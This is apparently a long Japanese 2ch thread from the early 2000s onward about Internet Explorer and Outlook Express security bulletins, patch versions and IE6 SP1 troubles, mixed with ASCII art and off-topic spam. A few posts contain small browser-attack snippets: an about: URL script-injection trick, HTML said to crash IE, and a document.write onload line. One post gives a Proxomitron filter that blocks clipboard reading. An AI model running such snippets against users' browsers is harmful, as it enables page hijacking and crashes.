http://www.microsoft.com/japan/technet/security/bulletin/ms02-047ov.asp
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(高) Gopher プロトコルを解釈する部分の脆弱性を悪用し
バッファのオーバーラン攻撃が行われる可能性のある問題です。
MS02-027 では、回避策のみをお伝えいたしましたが今回の
修正プログラムを適用することで対策することができます。
(高) 特別にフォーマットされたテキストを表示するために使用される
ActiveX コントロールの脆弱性を悪用しバッファのオーバーラン攻撃が
行われる可能性のある問題です。
(中) XML データを表示する HTML ディレクティブを処理する方法が
不適切であったために、ローカルファイル を読み取られる可能性のある
問題です。
(中) [ファイルのダウンロード] ダイアログ ボックス内のファイルの
ダウンロード元の場所を表示する方法に問題があり、
ユーザーに悪意のあるファイルを信頼されたサイトからのものであると
思い込ませ、ダウンロードするよう誘導される可能性があります。
(高) MS02-005 で修正した 「フレームのドメイン照合」 の脆弱性の
新たに確認された変種です。この変種により、ローカル システムの
実行可能ファイルを呼び出し悪用される可能性があります。
(しかし、実行可能プログラムにパラメータを渡すことはできないため、
パラメータを指定する必要のあるプログラムを操作する事は不可能です。)
(中) MS02-023 で最初に説明した
「ローカル HTML リソースのクロスサイト スクリプティング」 の脆弱性の
新たに報告された変種です。
クロスサイトスクリプティング (CSS) により、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。

>>755 累積修正パッチ入れてみた。ウィンドウズアップデートでも更新可。
バージョン情報にQ323759が追加されていた。IE6なんだけど、更新バージョン
に7個もＱ〜が並んでる。早くSP1出してくれよー。

俺なんか８個並んでるよ・・・・。

俺のところは、この８つなんだけど
皆は、どう？

Q306121; Q312461; Q313675; Q316059;
q313829; q319182; Q321232; Q323759;

こんなん出ました。
http://w3j.org/nazokb/jp4110000.html

>>758
Windows Me,XPのひとはＭＳ02-014が対象外なのでq313829を除く７つだ。

>>758
6個だった（Windows2000 sp3, IE6）
Q312461, Q313675, Q316059, q319182, Q321232, Q323759

Q321232とQ323759の2つしかないよ

おれは7つだ。758の一番初めのやつがないよ
IEのVerは、6.026
758のバージョン教えれ

＞　Gopher プロトコルを解釈する部分の脆弱性を悪用し
＞　バッファのオーバーラン攻撃が行われる可能性のある問題

先日、２ｃｈに貼られてたリンクから、これを悪用したらしきページをふんだんだけど
どんなコードが実行されたのか不安なんで、どなたかリンク先分かりますかね。
ひよこのGIFが右から左に更新してるページでした。

SP2,Q319182,Q321232,Q323759

更新じゃないや。行進だ。ひよこの行進。　

WinMeで6.026だけど、Q321232とQ323759の二つだけ。

ＩＥ５は大丈夫なのですか？

一つしかなくても、累積パッチだから
過去の穴は全部塞がれていると思う

>>767
同じく。
最近再インストールしてWindousUpDateでいっぺんにパッチ当てたからかな？

MS02-047のパッチを当てたらMS02-046は当てなくていいんですか？

もう一回WindousUpDate行って重要な更新がなくなればいいんだよ。

今入れたら、こうなった。

Donut : RAPT #18y
OS : Windows 98 (4.10.2222) A
IE : 6.0.2600.0000 ;Q321232;q313829;Q323759;

ＩＥの最新バージョンは、
http://pc.2ch.net/test/read.cgi/sec/1021363841/118

これは？
http://www.mainichi.co.jp/news/flash/keizai/20020825k0000m020046000c.html

>>771 君がターミナル サービスを提供する Web サイトの Web マスター
ならば必要、そうでなければＭＳ02-047のみ必要。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-046.asp

>>775 なんだか不親切な記事だね。

8月24日　20:41
米マイクロソフト：
ネット閲覧ソフトに不具合　修正ソフト提供
　米マイクロソフトは２２日、同社のインターネット閲覧ソフトの「インターネット・
エクスプローラ」とビジネス用ソフト「オフィス」にセキュリティー上問題があると
警告した。同社は対応するソフトを無料で提供し、使用を呼び掛けている。
問題になったのは、最新のインターネット・エクスプローラ３種類と「オフィスＸＰ」
など１３種類のソフト。（ニューヨーク共同）
［毎日新聞８月２４日］ ( 2002-08-24-20:39 )

なんじゃこりゃ？　さすが経済記者だな、こいつ。

レスくれた方さんくす。

>>772
WindousUpDateはあまりやりたくないんです。
スパイウェア入れられるみたいなので。

>>776
多分使っていないと思います。
よってMS02-047だけにしておきます。

>>768
ちょっと遅いかも知れんが・・
IE5は、マイクロソフトはサポートを打ち切った。
よって、セキュリティホールが発覚してもパッチは出ない。

今回、5.0用がないのも、安全だからということではない。
IE5.5ないし、6.0にしろ、ということだね。

んでもってIE5.5ないし、6.0にすると重いから
新しいの飼え！ってこと？

＞スパイウェア入れられるみたいなので

おまえのプライバシーなんか　誰も興味ねーよ　自意識過剰クン
キミは自分が思ってるほど誰からも重要視されとらんのよ

やましいことでもあるんじゃないのか？

>>781,782
お前ら本当にバカだな。
ちょっとは社会のこと勉強しろ。

そんなに不安ならIEに依存しないタブブラウザやNNを使えばいいんだよ

>>784
いちいち上げんなボケ。

これって、クロスサイトスクリプティングの脆弱性というものですか？

InternetExplorerでアドレス欄に「about:<script>window.open("http://www.yahoo.co.jp/")</script>」
って入れるとウインドウが開いてヤフーがでます。

どうも「about:」に続いてＨＴＭＬコードを書くだけで、ＨＴＭＬコードの部分のタグが有効になったページが
表示されます。
このＨＴＭＬコードのところにscriptタグに続いてクッキーをアップロードするJavaScriptや
特定の危険なページを開かせるコードとか書くと危険な気がします。

すでにこのことは、がいしゅつでしょうか？

age

最新バージョンがQ321232なんだけど、
最近ちょっと気づいたことがある。

IE開くと、ホームページがgoogleに設定されてるんだけど、
googleに接続する前に一瞬216.〜につながれてるみたい…

IE6．0に更新するまではこんなことなかったと思うのだけど。

あと↑でいわれてる奴ってALEXA(スペル違うかも)なの？
ad-awareでレジストリでIEのところにでてきたので削除したけど。
その時寝ぼけててバックアップとらずに削除しちゃったけど今のところなんともないや。

216.〜につながらずにどうやってgoogleにいくのかと聞きたい。

www.google.com www.google.co.jp 216.239.33.101
google.com 216.239.51.100 216.239.35.100
google.co.jp 216.239.37.100 216.239.39.100 216.239.33.100 216.239.35.100

>>788
googleは　216.239.33.101　だからそれが表示されただけじゃないかな

ヽ(ﾟ∀ﾟ)ノｱﾋｬ



ありがとうございました。

あげ

http://www.zdnet.co.jp/news/0209/06/ne00_mshole.html

広範囲に影響、Windowsの新たな脆弱性

同社はこのセキュリティホールを深刻度「高」として、セキュリティ警告を発行。WindowsおよびMacintosh対応プログラムを含め、
1ダース以上のMicrosoft製品で、Webサイトやソフトウェアコードの信頼性確認に利用される「電子証明書」の処理に影響を及ぼす可能性がある。

　この欠陥を悪用すれば、正規の電子証明書を発行しているWebサイトに、別の偽の電子証明書を発行させ、
利用者のコンピュータに不正アクセスしたり、その利用者のパスワードやクレジットカード番号を盗み出すことができる。

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-050.asp

こっちも

MicrosoftがIE 6 Service Pack 1を準備中
Microsoftが，Internet Explorer（IE） 6 Service Pack 1（SP1）を準備して
いることが 明らかになった。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020909/1/

おぉー後三日もすれば落とせるな

>>795
遅きに失した感ありすぎ。

英語とドイツ語はもう出てるな

、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html

題名が変だったｽﾏｿ

IE に新たな脆弱性、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html

サービスパック出しても次々と…
もう駄目だこりゃ

Microsoft VM

http://slashdot.jp/article.pl?sid=02/06/15/060248&mode=thread

メギャーン

http://www.watch.impress.co.jp/internet/www/article/2002/0910/mjvm.htm


Microsoftの「Internet Explorer(IE)」に付随するMicrosoft製のJava環境に複数の深刻な
セキュリティーホールが発見された。このセキュリティーホールを発見したのはフィンランドの
Online Solutions社で、Microsoftはこの問題を認め、現在パッチを準備している最中だという。
9日にMicrosoftより発表された「Internet Explorer 6 SP1」では、未対応の問題である。

穴のあいた　ざる

変

MS02-050はmacの人のみ？
解説読んだが意味分からん。

http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp

...

>>807
よく読めよ。影響を受けるソフトウェアのところにかいてあるだろう。

Becky!2が2.05.05でIE6 SP1を入れるとHTMLメール作成で落ちるからこれに対処する修正を施した2.05.06が出たが、
IE6 SP1の日本語版が出てない現状では検証のしようがねーぞ。

ってか、もう隠れリリースされてたのか。
http://download.microsoft.com/download/ie6sp1/finrel/6_sp1/W98NT42KMeXP/JA/ie6setup.exe

↑トホホ、コンポーネントダウソできず。

パッチをちゃんと入れてたらSP1を入れる必要はないんでしょ？
なんか怖い。

人柱どもの報告を待ちませう

IE6 SP1日本語版リリース
http://www.microsoft.com/windows/ie_intl/ja/

http://pc.2ch.net/test/read.cgi/sec/1021363841/143-

IE6SP1 readme から抜粋。

・Window.open はフルスクリーンモードでは開けなくなった
・Window.{move,resize,open} メソッドを使ってウィンドウを画面の外に移動させることはできなくなった
・COM サーバーをインストールするには ActiveX を有効にする必要がある
・cookie を使うためにはサーバ名が [A-Za-z0-9\-.]* でなければならない
・WebOC はインターネット上では利用できなくなった
・OBJECT タグの codeBase 属性はローカル パスを指定できなくなった
・制限付きゾーンではフレームと IFRAME が無効になる
・ファイルのダウンロード ダイアログ ボックスの変更
・Gopher プロトコルは既定では無効になった

>>816
結局SP1はいいの？　悪いの？

>>814
Win2000SP3+Hotfix
これにIE6SP1適用で問題なしです。

>>817
SP1は適用してもいいかと。。。

自分、SP１入れたら、調子悪くなって、ネットできなくなったんで
削除した。XPです。

WinME+IE6SP1+MS02-052で現在異常なし。

SP1がそもそもインスト出来ない。
何度やっても途中でポシャる。
それよりもＰＦＷplusの表示異常なんとかして。
質問を送ったのにマカフィーときたら1週間以上放置。

オフラインなんちゃらと上級オーサリングがインストされてないって文句いうが
おまえがインストしないんじゃねーかIEよ

使わないからいいや

スパイウエアが５個インストールされた。

↑
SP1のこと

http://www.430.jp/rak2/user/ryuugasakikaori/

>>823
訂正
スパイウエアかどうかは不明。Ad-awareで検出されたファイルが５個だった。

レスさんくすでした。
念のため色々バックアップ取ってから入れよう・・・。

削除して良しですか？

Alex飼ってみようかな♪

消してヨシ

MS02-052って、
http://www.microsoft.com/japan/technet/security/bulletin/ms02-052.asp
この情報によるとWindows Updateからしか入手できないようですけど
ファイルで入手できないでしょうか？

>>831
http://pc3.2ch.net/test/read.cgi/win/1024631995/308

何故ファイルで必要なのでしょうか？

>>832
あちらの板にあったのですね。ありがとうございます。

諸事情で、ネット接続できないＰＣを持っていますので。
今後、Windows Updateのみの配布形式に徐々に移行していくのでしょうか・・・

SP1入れたら、フリーズする様になった。

他板でもSP1を入れて不具合が出てる人が続出ですね。

結論　SP1は入れるな

このフリーズはSP1のせいか！

フリーズはしないんだがMS02-052入れてもヴァージョンとこに出てこない
Windows Updateではもう入れたことになってるからいいのか？

>>837
MS02-052はJAVA仮想マシンのバグ修正だから
IEの修正と直接は関係無い。よってIEのバージョンには出てこない。

MSめ！！重要な更新にSP1入れやがって！！

証明書確認の問題により、IDが偽装される (Q328145) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
今回の更新内容
Internet Explorer for Mac (for OS 8.1 to 9.x) および
Internet Explorer for Mac (for OS X) の問題を修正するプログラムを
公開しました。

>>840
それよか MS02-050 のバグ修正版をはやく出せぃ！！＞Ｍ＄

MS02-052入れたら立ち上がらなくなった・・・・
SafeModeでスキャンディスクしてもその後固まってしまう・・・・
(WinMe＋IE6/SP1)

今さっき6.0SP1をインスコしたよ〜。
今これで見てるんだぜ〜。OutPost+Proxomitronで
完璧なんじゃないんかな〜って自己満足してまーーす｡

先日、IE 6 SP1 にしたら「エラーになった」と文句言ってきて、
オレがていねいにアドバイスしてやったヤツが、まぁ〜た、
　　「OE で、エラーがでました！」
とか報告してきやがった。粘着ヴォケは手がつけられん

>>842 パッチ当てるときはFWやウィルス対策ソフトなどの常駐アプリを
停止させて行わないと、不具合出ることあるよ。あと、パッチは古い順に
当てて、一つ当てるごとに再起動する。
WinME+IE6SP1+MS02-050+MS02-052+MS02-054+MS02-055で無問題。

WinME ユーザーから質問あったけど、
IE アンインストールで「以前の Windows の環境に戻す」とかにして、
Win再起動して、Program Files\Internet Explorer を削除してから、
Microsoft から IE 6 SP1 のファイルをすべてダウンロードしてから、
「カスタムインストール」でインスコ。
さらに、MS02-008パッチあて とか、わけのわからん指示もあるが…

>>845
もちろん常駐アプリは止めてやったんですが・・・。
でもパッチ当てる順番はWindowsUpDateでやったのでよくわからんです。

OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/168
にInternet Explorerの最新バージョンをOS別にまとめました。

http://pc.2ch.net/test/read.cgi/sec/1021363841/168-n

クリップボードの内容を攻撃者に盗まれるという脆弱性あり。
http://homepage2.nifty.com/spw/secure/008/index.html
http://pc3.2ch.net/test/read.cgi/win/1031641815/391

Proxomitronをバイパスモードに切り替えて検証した結果、IE6 SP1でも再現可能。
MSは認識していない模様。
Proxomitron使用者は以下のフィルタを導入すること。

Name = "ClipBoard Unsniffer"
Active = TRUE
Limit = 256
Match = "clipboardData"
Replace = "proxClipBoardData"

Proxomitron非使用者は「スクリプトによる貼り付け処理の許可」を無効にすること。

>>850　おおｻﾝｸｽ。確かにIE6SP1で再現された。

もうダメポ

マイクロソフト，セキュリティ・ホールの深刻度に関する評価方法を変更
http://pc.2ch.net/test/read.cgi/sec/1021363841/215

MS02-065
「MS02-065: Microsoft Data Access Components のバッファオーバーラン
により、コードが実行される (Q329414)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
MS02-066
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp

http://pc.2ch.net/test/read.cgi/sec/1021363841/216-218

恒例行事age

オミトロンやFWでガチガチに固めてても､うｐでーと必須？
(ガチガチといっても､マニュアル以上の事はできないけど)

>>856
バグをどうやって塞ぐのか分かってるか？

http://www.asahi.com/business/update/1127/034.html

マイクロソフト、政府向けなどにＯＳの「設計図」公開

MDAC2.7インストールしようとした時に、
常駐アプリ全て終了させても
使用中のアプリケーションの終了を促すダイアログが表示されるんだけど、
どうしたらいいの？

使ってるOSは、WinNT4.0Serverです。
IIS等のサービスを終了させてもダメですた。

>>859 インスコするときに説明するダイアログが出てたはずだけど。
どうしたらいいの → 使用中のアプリを終了させる。
http://www.microsoft.com/japan/msdn/data/download/mdac/27/27.asp

MS02-065、MDAC2.7関係は
http://pc.2ch.net/test/read.cgi/sec/1021363841/250-251のリンク先も参照。

>860
いや、全てのアプリと、IIS等のサービスを
終了させても、
”システムプロセスで使用されている”
と言ったエラーメッセージが表示されてしまうんだけど・・・

システムプロセスで使用されている場合は、
更新不可能なのかな？

>>862 セーフモードでも使用中になる？

age

>862
NT4にはセーフモードは無いです。

セキュリティのかかった場所に移動しようとすると
「ページを表示できません」
になります
どうしたらいいのでしょうか？
誰か助けて下さい。
「SSL2.0を使用する」と
「SSL3.0を使用する」にはチェックしたのですが
何も変わりませんでした

★★非IE系ブラウザ★★
オペラ
http://jp.opera.com/
http://pc3.2ch.net/test/read.cgi/win/1036518411/

ネスケ
http://wp.netscape.com/ja/

Mozilla
http://jt.mozilla.gr.jp/

Mosaic　（わらい）
http://archive.ncsa.uiuc.edu/SDG/Software/Mosaic/


★★ブラウザランキング★★
http://pc3.2ch.net/test/read.cgi/software/~~~~303519/

ttps://www.netsecurity.ne.jp/article/1/7677.html
IE、OE の安全な利用には高度な知識と情報収集能力が必要！？(2002.12.3)

　今回、マイクロソフト社がリリースした MS-066 (註MS02-065の間違い) パッチは、IEやOEは、
初心者向けではないことを端的に示している。
　パソコンを買った時にタダでついているIE、OEをそのまま利用している人を見てもただの初心者
と思ってはいけない。高度な知識と情報収集能力を兼ね備えたエキスパートか、IT社会の健全な
成長のための無垢な犠牲者のどちらかなのである。読者諸氏には、周知の事実だと思うが、
つねに脆弱性と隣り合わせのIE、OE利用者の場合、初心者がトラブルなく利用できているという
状態は、偶然の産物でしかありえない。それは無垢な犠牲者の予備軍なのである。
[Prisoner Langley]

あえてレス。
IEはちょっと。。。。。んだけど。

OEは、送信専用なら、これだけhtml編集に有用なメーラーは無いっす。
htmlメルの海辺画像とか背景貼り付けってのは、ネットナンパに最も有効な手段でし。

受信の方は。
OEのメルテキスト化機能があまり膾炙していないのかなぁ。
そこらへんは、今後啓発してきましょ（らぶ

モザイクってまだあったんだ・・・

>>869
でもお金出してベッキーとかユードラとかあたりをレジストしちゃった人は
OEにしにくいのかもね・・・、おれもそのクチだけど

>>870
テキスト化と言えば、ポスペも。
んでも非対応メーラーの相手に、ペットが拡張子ppdのファイルになってまって、「ウイルス？」と疑われたりするけど。

昔掲示板で何度か答えたことがあるな
「ppdってファイルが添付されてたんですけど・・・何ですかこれ？」
って、もちろん質問者は女性名のステハン。

「MS02-068: Internet Explorer 用の累積的な修正プログラム (324929) 」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068ov.asp
概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-066 : Internet Explorer 用の累積的な修正プログラム
(Q328970) で修正された問題に加えて、新たに 1つの問題を排除します。
対象となる製品
・ Microsoft Internet Explorer 5.5 Service Pack 2
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 6 Service Pack 1
Microsoft Internet Explorer 5.01 は、この問題の影響を受けません。

http://pc.2ch.net/test/read.cgi/sec/1021363841/260

update激重だね

http://www.pivx.com/larholm/unpatched/

ここの件数が 0 になるのはいつ。

859　は、結局解決したのか？

漏れら極悪非道のageブラザーズ！
今日もネタもないのにageてやるからな！
￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 ∧＿∧ 　 ∧＿∧ 　　　age
　（・∀・∩）（∩・∀・）　　　　age
　（つ　　丿 （ 　　⊂）　age
　 （　ヽノ　　 ヽ/　　）　　　age
　 し（＿）　　 （＿）Ｊ

>876
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/

age

（＾＾）

放置プレイ？
ttp://japan.internet.com/webtech/20030206/11.html

>>881
「OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法」でｶﾞｲｼｭﾂ
http://pc.2ch.net/test/read.cgi/sec/1021363841/330-335n

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

>>1
マジ？

>>888
糞スレ上げないでよ。というか昔の奴に語りかけても意味ないじゃん

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

１．次の内容のＨＴＭＬファイルを作成する。

<script>
alert("ここでＦ１を押す！");
</script>


２．ダイアログに従い、Ｆ１を押す。
３．確実にＩＥが落ちます

えらく古いスレが上がってきたな

（・∀・）ｺﾝﾆﾁﾊ!!!

剥けた

（・∀・）ｺﾝﾊﾞﾝﾜ!!!

IE5.5のUser Agentに「(R1 1.3)」ってのが付いたり消えたりするんですけど、
これって何ですか？

>>897
>>893
板違い。Windows＠2ch掲示板http://pc5.2ch.net/win/
IE5 (5.015.5)統合スレッド 3http://pc5.2ch.net/test/read.cgi/win/1079153566/l50

IE5.5のUser Agentに「(R1 1.3)」ってのが付いたり消えたりするんですけど、
これって何ですか？

今だ！900ゲットォォｫｫ！！
￣￣∨￣￣￣￣￣￣￣￣
　　 　 ∩ ∩
　　 〜| ∪ |　　　　　　　　　(´´
　　 ﾍﾉ　　ﾉ　　　　　　　(´⌒(´
　　(（つ　ﾉ⊃≡≡≡(´⌒;;;≡≡≡
　　￣￣￣(´⌒(´⌒;;
　　　ｽﾞｽﾞｽﾞｽﾞｽﾞ

あげ

OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc8.2ch.net/test/read.cgi/sec/1021363841/
も980越えでdat落ち
ここも含めて総合スレにしない？
IE＋OE＋α（win板にもｽﾚあるけどこの板にもあったほうがいいと思うんでWindowsUpdateの話題もアリで）

スレタイ：
【IE】MS製ソフトのセキュリティ総合スレ【OE】

本文：
MS製ソフト各種のセキュリティと関連する話題（OS非限定）をセキュリティ板で語るスレです

>>902いくら連発されてもめげずにパッチ当て続けようってことで♪つけてみれば？
スレタイ：【IE】MS製ソフトのセキュリティを語ろう♪【OE】

本文：
MS製ソフト各種のセキュリティと関連する話題（OS非限定）をセキュリティ板で語るスレです

OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc8.2ch.net/test/read.cgi/sec/1021363841/
緊急！　WindowsUpdateをしましょう！
http://pc8.2ch.net/test/read.cgi/sec/1060956936/

ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥
http://pc8.2ch.net/test/read.cgi/sec/1005605775/l50
【MS謹製】Microsoft MBSA使ってる？【ツール】
http://pc8.2ch.net/test/read.cgi/win/1085558954/l50

>903
【IE,OE】MS関係のｾｷｭﾘﾃｨを語ろう♪【ﾏｲｸﾛｿﾌﾄ】
http://pc8.2ch.net/test/read.cgi/sec/1125125691/

★★★★★★★★★★★★★★★★★★★★★★★★★

ウイルス対策ソフトの検出力結果
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/

★★★★★★★★★★★★★★★★★★★★★★★★★

10月分ﾊﾟｯﾁage

>>785
うるせー馬鹿

IE5.01-SP4 っていつの間に出たんですか？

Windows 2000 SP4の中だけ

うんこー

はとぽっぽー

もういいよ

いつの話だよ

一千年

二千年前

欠陥だらけ

ひさしぶりに上げ

このペーの表示が崩れてるんだけど俺だけ？
http://www.itmedia.co.jp/enterprise/

only you

トップ、ニュース、企画、運用・・・・のリンクが
縦一列になってて読みにくいんだよな
不要な<span>が一杯入ってるのが原因かと思ったんだが
きっとブラウザの問題だな
Thx lot !

IEは糞

IE市ね

IEは悪質な技術誘導の権化

IEは時代遅れの産物

IEは低機能すぎる

IEは4ならよし

たまに禿げよう

さっさとPNGにちゃんと対応しやがれ

XHTMLに対応しろ糞が

拡張子から適当にMIME推測すんな

Firefoxが出てこなかったら
いまだにIE6並の低機能だっただろうな

国産のプニルとかネスケあるから問題なし

今度はadobeかよ！

あげ

表面的な動作なんてどうとでもなる

ちゃんと仕様に従え

うるせぇ

仕様に従わないから嫌い

たまには上げるべ

またかよｗ

まただよ

いい加減しろ〜IE

潜りすぎだろ

■国家破産

日本は昭和21年以来、再度破産しようとしています。
日本の借金は、現在国と地方を合わせた長期債務残高が
約700兆円。さらに、いわゆる隠れ借金の約400兆円の
合計は、なんと約1100兆円にもなります。

この借金は国内総生産(GDP)比(700兆円として141%。
隠れ借金を含めた借金1100兆円とすれば220%です)
でも世界最悪です。

しかし、借金に対し
平成16年度の税収は42兆円しかありません。

これでは、税収の1割を借金返済に充てても
700兆円を返済するには約170年かかり

隠れ借金を含めた1100兆円を返済するには
約260年もかかります。

平成16年度一般会計の歳出が
82兆円、税収は42兆円、新規国債発行は37兆円です。

財政を家計に例えるなら
借金総額が１億1000万円の人が、月収は約35万円
1ヶ月の生活費は約70万円、
不足分の約35万円を借金するのと同じことです。

IE8になったら
ちったぁましになるか

!

テキサス州議会は行政機関が(PCのOSを)Windows Vistaにアップグレードする事を
議会の書面による許可がない限り禁じる条項を含む予算を予備承認した。
ttp://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9130992

216 名前： ただいま名無し変更議論中＠詳しくは自治スレへ [sage] 投稿日： 2009/04/12(日) 15:48:34 ID:???
http://www.google.com/toolbar/ie8/intl/ja/
Google版IE8

どうやらMSとGoogleは手を結んだ模様。Firefoxを叩き潰すのかな。

就職氷河期の四大卒の就職率：文部科学省の統計より
（以下は、最も酷かった時期）
2000年　男性55.0％、女性57.1％
2001年　男性55.9％、女性59.6％
2002年　男性54.9％、女性60.0％
2003年　男性52.6％、女性58.8％
2004年　男性53.1％、女性59.7％
2005年　男性56.6％、女性64.1％


卒業年度　　　　求人数
1991年3月卒　　840,400人
2003年3月卒　　560,100人

　

いまどきIE5なんて

ちら

document.write("<body onload=window();>")

　 　 　 　∧＿∧　　　　　　ｶﾞｯ
　　　　　（,, ・∀・）　　人
　　　　 　（⊃ 　.(⌒).< 　>_∧∩
　　　　　　(__ノ⌒￣　 Ｖ｀Д´）/
　　　　彡　　　　　　　　　　　/ ←>>884